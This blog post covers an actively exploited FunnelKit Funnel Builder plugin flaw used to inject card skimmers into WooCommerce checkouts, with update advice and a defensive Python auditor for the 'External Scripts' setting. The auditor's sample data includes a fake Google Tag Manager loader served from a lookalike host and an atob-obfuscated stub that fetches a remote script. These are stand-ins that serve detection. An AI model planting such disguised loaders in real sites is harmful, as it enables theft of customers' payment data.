FunnelKit Plugin Vulnerability Steals Payment Data
By Steven | TrustYourWebsite
Source: BleepingComputer
A serious security vulnerability in the FunnelKit Funnel Builder plugin for WordPress is reportedly being actively exploited by attackers to steal payment card information from customers at checkout. According to BleepingComputer, the flaw affects all versions of the plugin before 3.15.0.3 and can be exploited without any login or authentication.
What is happening?
According to BleepingComputer, attackers are targeting an unprotected checkout endpoint in the plugin. This allows them to change the plugin's global settings without needing a password or account. Once inside, they inject malicious JavaScript code into a setting called "External Scripts," which then runs on every checkout page your customers visit.
The injected code is reportedly disguised as a fake Google Tag Manager or Google Analytics script, making it hard to spot. It opens a hidden connection to an external server and delivers a payment card skimmer, a piece of code designed to silently copy sensitive information as customers type it in. According to BleepingComputer, the stolen data can include credit card numbers, CVVs, billing addresses and other customer information.
The plugin is reportedly active on more than 40,000 websites, according to BleepingComputer.
What has FunnelKit done?
FunnelKit has released version 3.15.0.3 of the Funnel Builder plugin to fix the vulnerability. The company recommends that website owners update to this version immediately through the WordPress dashboard. FunnelKit also advises checking Settings > Checkout > External Scripts to look for any suspicious scripts an attacker may have already added.
It is worth noting that this reporting comes from BleepingComputer, a secondary news source, rather than a direct vendor advisory or official regulatory decision. The vulnerability has not received an official CVE identifier, according to BleepingComputer.
Steps to take now
If you use the FunnelKit Funnel Builder plugin on your WooCommerce store, here is what to do:
- Update immediately to version 3.15.0.3 or later via your WordPress dashboard
- Check your External Scripts setting under Settings > Checkout > External Scripts and remove anything unfamiliar
- Review your site against our security checklist for small businesses
- Read more about keeping WordPress plugins safe
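One way to triage what is saved in External Scripts before deleting anything: an added example, not FunnelKit's code and not from the report, that assumes the setting's raw HTML has been pasted into SAMPLE_SETTING and that a genuine Google Tag Manager or Analytics loader only fetches from the Google hosts listed (the allowlist and the sample tags are constructed assumptions).

```python
import re

# Hosts a genuine Google Tag Manager / Analytics loader fetches from.
# Allowlist is an assumption for this example, not taken from the advisory.
KNOWN_GOOGLE_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Decoding/eval helpers with no visible URL suggest a loader hiding its server.
OBFUSCATION_RE = re.compile(r"\b(atob|eval|unescape|fromCharCode)\s*\(")
LOOKALIKE_RE = re.compile(r"google|gtag|gtm|analytics", re.I)


def classify_script(attrs: str, body: str) -> dict:
    """Classify one <script> tag taken from the External Scripts setting."""
    hosts = {h.lower() for h in URL_HOST_RE.findall(attrs + body)}
    unknown = sorted(hosts - KNOWN_GOOGLE_HOSTS)
    if unknown:
        # A tag that talks like Google but loads from elsewhere is the disguise
        # described in the report; any other unknown host still needs review.
        lookalike = any(LOOKALIKE_RE.search(h) for h in unknown)
        verdict = "lookalike-host" if lookalike else "unknown-host"
    elif hosts:
        verdict = "ok"
    elif OBFUSCATION_RE.search(body):
        verdict = "obfuscated-inline"
    else:
        verdict = "inline-review"
    return {"verdict": verdict, "unknown_hosts": unknown}


def audit_external_scripts(setting_html: str) -> list:
    """Return one finding per <script> tag, in document order."""
    return [classify_script(a, b) for a, b in SCRIPT_TAG_RE.findall(setting_html)]


# Constructed sample of what the setting might hold: a genuine GTM loader,
# a loader dressed up as Google but served from a lookalike host, and an
# inline stub that hides its download URL behind atob().
SAMPLE_SETTING = """
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script async src="https://gtm-analytics.example/gtag/js?id=G-XXXXXXX"></script>
<script>var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv');document.head.appendChild(s);</script>
"""

if __name__ == "__main__":
    for n, finding in enumerate(audit_external_scripts(SAMPLE_SETTING), 1):
        print(f"script #{n}: {finding['verdict']} {finding['unknown_hosts']}")
```

Anything other than "ok" deserves a look; a legitimate tag from a non-Google vendor will show as "unknown-host", so extend the allowlist with hosts you deliberately added rather than ignoring the verdict.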
What does this mean for your website?
If you run an online shop using WooCommerce and the FunnelKit Funnel Builder plugin, your customers' payment details could be at risk if you have not yet updated. Updating your plugins promptly is one of the most straightforward ways to protect your customers and your business. Even if you are unsure whether your site is affected, checking the External Scripts setting costs nothing and takes only a few minutes.